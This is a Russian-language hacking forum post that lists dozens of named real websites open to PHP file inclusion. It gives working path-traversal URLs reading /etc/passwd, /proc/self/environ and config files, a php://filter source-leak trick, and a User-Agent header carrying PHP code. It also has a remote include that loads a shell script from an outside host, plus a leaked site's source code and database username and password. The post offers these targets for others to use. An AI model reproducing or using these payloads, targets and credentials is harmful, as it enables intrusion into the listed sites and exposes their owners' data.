PHP Иньекции

http://www.summerschoolalpbach.at/index.php?file=.htaccess

 

http://aren.org/newsletter/2007-litha/action.php?num=../../../../../../../../../etc/passwd%00
POST

 

http://www.filllpg.co.uk/index.php?page=/etc/passwd

 

http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00

 

http://shareaza.sourceforge.net/?id=../../../../../../../../../../etc/passwd%00

 

Code:

[COLOR=White][B]http://www.theschoolhouseinn.net/pkg/includes/cart.inc.php?dir_path=http://kabooos.persiangig.com/shell/2010.txt?[/B][/COLOR]

Code:

[COLOR=White][B]http://www.kamparkab.go.id/index.php.../etc/passwd%00[/B][/COLOR]

Code:

[B][COLOR=White]http://dev.peliton.net/Portals/0/h.asp;.jpg.jpg[/COLOR][/B]

Code:

[COLOR=White][B]http://navymemorial.org/Portals/0/Mast3rJ0int.asp;.jpg[/B][/COLOR]

Code:

[COLOR=White][B]http://www.vsa-software.com/mlsportfolio/index.php?content=../../../../../../etc/passwd%00[/B][/COLOR]

Code:

[COLOR=White][B]http://www.cazino-monteoru.ro/index.php?pg=../../../../etc/passwd[/B][/COLOR]

 

PR ~6, в индексе почти 20 000 страниц может куми-нибудь пригодится)

 

Code:

http://www.tierhilfe-spanien.de/thspa.php?inc=../../../../../../../etc/passwd%00
http://www.albersfoundation.org/Albers.php?inc=../../../../../../../../../etc/passwd%00

 

h_ttp://www.kemtipp.ru/show.php?f=../../../../etc/passwd

 

http://www.sintraems.org.br/main.php?pg=/proc/self/environ

Header:

Code:

Host
User-Agent :[B][COLOR=DarkOrange] <?php phpinfo(); ?>[/COLOR][/B]
Accept
Accept-Language
Accept-Encoding
Accept-Charset
Keep-Alive
Connection

 

Code:

http://www.ra-dar.ru/index.php?path=../../../../etc/passwd
http://www.ra-dar.ru/index.php?path=../htdocs/

 

http://www.racetools.de/index.php?page=/etc/passwd
http://www.soulbrasil.com/index.php?page=/proc/self/environ
http://www.eschoolbc.com/?page=../../../../../../../../../../proc/self/fd/2%00
http://www.undp.org.al/index.php?page=../../../../../../../../../../proc/self/fd/14%00
http://www.bornathleticstore.com/blog.php?page=../../../../../../../../../proc/self/environ
http://www.modelspromo.com/index.php?page=../../../../../../../../../../../../etc/my.cnf
http://www.placeneeded.com/index.php?page=../../../../../../../../../../var/log/dmesg
http://www.keewatinmaritimemuseum.com/?page=../../../../../../../../../../../proc/self/fd/7
http://www.gardenhoodatlanta.com/admin/index.php?page=../../../../../../../../proc/self/fd/1
http://www.khandelwalweds.com/index.php?id=../../../../../../../../proc/self/maps
http://www.asuslaptop.com/index.php?page=../../../../../../../../../proc/sys/../self/cmdline

 

http://www.avionews.com/index.php?corpo=../../../../../../../../../../etc/passwd

 

http://www.dailymail.com/ap/ApWorld/201103181127?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

 

http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index

PHP:


<?php
//ini_set('display_errors', 1);
//error_reporting(E_ALL);
    /*
        index.php
        Author:            Harry Helmich
        Created:        2006
        Description:    Primary controller for the application.

        Log:
        harry        2006-10-13    Added session processing.
        harry        2006-11-09    Code formatting.
        Alyssa        2007-06-28    Added code to check for php attacks
    */

    // Start a session for user tracking.
    @session_start();


    include_once("util/form_functions.php");
    
    if ( !isset($_SESSION['bLoggedIn']) || empty($_SESSION['bLoggedIn']) ){
        $_SESSION['bLoggedIn'] = false;

        /* Check if the user has set cookies through Remember Me */
        if(isset($_COOKIE['MPUserName']) && isset($_COOKIE['MPPassword'])){
            $userid = $_COOKIE['MPUserName'];
            $password = $_COOKIE['MPPassword'];
            $_POST['userid'] = $userid;
            $_POST['password'] = $password;
            login($userid,$password);
        }
    }
    



    // Display the header
    require_once("header.php");
    //echo '<div class="content">';

    

    /*
        Check for the page variable.  If it is empty or
        uninitialized, set it value to the default or
        home page.
    */
    


    if ( isset($_GET['page']) || !empty($_GET['page']) )
    {
    
        $page = $_GET['page'];
        
            
    }else{
        $page = "home";
    }
    $sanitycheck = strpos($page, "http");
    
    
    
    if ($sanitycheck === false) {
        // Include the specified page.
        //include(realpath(basename($page)));
                  include($page.".php");
    } 
    else {
        die("Possible PHP Injection Attack");
    }    
    
    //echo "</div>";

     // Diplay the footer
     require_once("footer.php");
?



интересная протекция )

 

читалюга

http://www.vintagetoys.com/help.php?template=../../../../../../home/twinkles/public_html/dbconnection.php%00

PHP:

<?php
$Query = mysql_connect ("localhost", "twinkles_VTDB", "reTEP58") or die ("Vintage Toys is not available at the moment.  Please try again later.");
mysql_select_db("twinkles_vintagetoys", $Query);
?>


 

[IP 208.125.234.183]

Code:

[COLOR=DarkOrange]http://web2.paulsmiths[COLOR=Blue].edu[/COLOR]/PAGE=../etc/passwd[/COLOR]

 

http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00
Пользуйтесь на здоровье!

 

LFI :: kruta.ee :: PR - 3

Code:

_http://www.kruta.ee/main.php?lang=est&pg=../../../../../../data03/virt6224/domeenid/www.kruta.ee/htdocs/func

 

Code:

http://people.clarkson.edu/~williaem/ew/home2.php?file=/etc/passwd

allow_url_include = on + никакой фильтрации